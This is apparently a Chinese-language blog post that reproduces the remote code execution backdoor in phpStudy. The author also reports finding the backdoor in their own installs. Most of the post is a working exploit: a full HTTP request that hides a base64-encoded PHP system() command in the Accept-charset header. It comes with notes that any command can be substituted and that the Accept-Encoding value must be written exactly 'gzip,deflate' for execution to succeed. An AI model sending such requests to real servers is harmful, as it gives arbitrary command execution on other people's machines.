0%

Phpstudy - RCE 复现

check

9月26号就写好了,一下子就到这个时候了,严重拖延症

先用公开的脚本check一下自己机器上常用的,phpstudy后门文件分析以及检测脚本

呵呵,中招,一直在使用phpstudy2016版,上图是2018测试的(我的2016一样中招,被我修复了,没截图),也就是说做肉鸡三年了(微笑),不过好在我只在用的时候开启apache

阅读本篇文章能了解到:phpstudy, RCE

首发的文章说,官网下的并不会出问题,我使用的一直是官网的,上图也是2018版官网下的,一样中招,也就是phpstudy早在2016年甚至更早就被黑了。

check

复现

1
2
3
4
5
GET / HTTP/1.1
Host: 192.168.2.51
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept-Encoding: gzip,deflate
Accept-charset: ZWNobyBzeXN0ZW0oIm5ldCB1c2VyIik7

rce

呵呵,真好用!真香!

只需要更改ZWNobyBzeXN0ZW0oIm5ldCB1c2VyIik7base64编码的命令而已

坑点

Accept-Encoding: gzip,deflate
注意:gzip,deflate 必须是此格式,中间只能有逗号,不能有空格

搞得我又测了好久,因为fiddler抓包是这样的格式gzip, deflate,这样会导致rce失败

参考链接

https://www.t00ls.net/viewthread.php?tid=52922
https://www.t00ls.net/viewthread.php?tid=52966